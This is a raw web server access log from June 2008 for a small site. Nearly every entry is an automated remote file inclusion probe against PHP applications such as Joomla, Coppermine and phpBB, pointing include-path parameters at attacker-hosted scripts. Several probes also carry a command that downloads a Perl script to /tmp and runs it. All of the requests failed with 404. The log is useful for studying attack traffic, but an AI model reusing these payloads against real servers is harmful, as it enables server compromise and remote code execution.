89.108.80.142 - - [15/Jun/2008:18:46:24 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
200.68.101.180 - - [15/Jun/2008:18:46:25 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:18:46:35 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.86.91.115 - - [15/Jun/2008:18:46:35 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.68.101.180 - - [15/Jun/2008:18:47:39 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.neighborhoodglimpses.com"
200.68.101.180 - - [15/Jun/2008:18:47:40 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.neighborhoodglimpses.com"
125.245.146.189 - - [15/Jun/2008:18:48:21 -0700] "GET /logs/access_080128.log/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:18:49:59 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:18:50:00 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:18:50:00 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.195.37.94 - - [15/Jun/2008:18:50:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:18:51:44 -0700] "GET /logs/access.log/index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.221.143.111 - - [15/Jun/2008:18:51:44 -0700] "GET /logs/index.php?go=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.146.242.105 - - [15/Jun/2008:18:52:02 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.146.242.105 - - [15/Jun/2008:18:52:02 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:52:52 -0700] "GET /logs/access.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:52:52 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:52:53 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:52:57 -0700] "GET /logs/access_080211.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:52:57 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:52:59 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
202.5.95.201 - - [15/Jun/2008:18:53:06 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
202.5.95.201 - - [15/Jun/2008:18:53:06 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:57:45 -0700] "GET /logs/access_071217.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:57:45 -0700] "GET //becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:57:45 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:58:42 -0700] "GET /logs/access_071112.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:18:58:44 -0700] "GET /logs/access_080414.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:18:58:44 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
74.55.76.110 - - [15/Jun/2008:18:58:44 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
212.241.217.240 - - [15/Jun/2008:18:59:36 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
212.241.217.240 - - [15/Jun/2008:19:00:03 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
212.241.217.240 - - [15/Jun/2008:19:00:04 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
212.241.217.240 - - [15/Jun/2008:19:00:04 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:00:35 -0700] "GET //becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:00:36 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:00:46 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:00:47 -0700] "GET //becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:00:47 -0700] "GET /logs/access_071217.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.12.149.44 - - [15/Jun/2008:19:01:04 -0700] "GET /logs/access.log//admin/admin_users.php?phpbb_root_path=http://www.joerg-krug.de/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
201.12.149.44 - - [15/Jun/2008:19:01:05 -0700] "GET //admin/admin_users.php?phpbb_root_path=http://www.joerg-krug.de/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
201.12.149.44 - - [15/Jun/2008:19:01:12 -0700] "GET /logs//admin/admin_users.php?phpbb_root_path=http://www.joerg-krug.de/vnc/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:02:43 -0700] "GET /logs/access_071112.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:03:11 -0700] "GET /logs/access_071112.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:03:19 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:03:20 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.32.194.164 - - [15/Jun/2008:19:03:21 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [15/Jun/2008:19:03:21 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [15/Jun/2008:19:03:21 -0700] "GET /logs/access_071217.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:03:22 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.9.93.30 - - [15/Jun/2008:19:03:23 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.99 - - [15/Jun/2008:19:05:46 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.99 - - [15/Jun/2008:19:05:47 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:19:06:23 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.43.197.73 - - [15/Jun/2008:19:06:23 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.80.152.210 - - [15/Jun/2008:19:06:53 -0700] "GET /logs/!rfihttp://www.ontmoetengroet.nl/cgi-bin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.80.152.210 - - [15/Jun/2008:19:06:53 -0700] "GET /logs/access.log/!rfihttp://www.ontmoetengroet.nl/cgi-bin/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.99 - - [15/Jun/2008:19:07:22 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:07:42 -0700] "GET /logs/access.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:07:42 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:07:43 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:07:43 -0700] "GET /logs/access.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:07:43 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:07:44 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
212.241.217.240 - - [15/Jun/2008:19:08:01 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
212.241.217.240 - - [15/Jun/2008:19:08:01 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:09:17 -0700] "GET /logs/access.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:09:19 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:09:19 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:19:10:21 -0700] "GET /logs/access_071001.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:11:23 -0700] "GET /logs/access_080211.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:11:23 -0700] "GET /logs/access_080211.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:11:23 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:11:23 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:11:23 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
92.48.68.79 - - [15/Jun/2008:19:11:23 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
81.75.227.51 - - [15/Jun/2008:19:12:25 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
81.75.227.51 - - [15/Jun/2008:19:12:26 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:12:59 -0700] "GET /logs/access.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:12:59 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:12:59 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:13:01 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:13:01 -0700] "GET /logs/access_080211.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:19:13:05 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:19:13:58 -0700] "GET /logs/access_080211.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:19:13:58 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
65.42.183.2 - - [15/Jun/2008:19:13:58 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
121.254.170.200 - - [15/Jun/2008:19:14:01 -0700] "GET //contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
121.254.170.200 - - [15/Jun/2008:19:14:01 -0700] "GET /logs//contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
121.254.170.200 - - [15/Jun/2008:19:14:01 -0700] "GET /logs/access.log//contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:15:18 -0700] "GET /logs/access.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:15:18 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:15:18 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:15:26 -0700] "GET /logs/access_080211.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:15:26 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:15:26 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:16:57 -0700] "GET /logs/access_080211.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:17:00 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.250.121.2 - - [15/Jun/2008:19:17:02 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.80.142 - - [15/Jun/2008:19:17:04 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
89.108.80.142 - - [15/Jun/2008:19:17:04 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
200.105.208.186 - - [15/Jun/2008:19:17:18 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
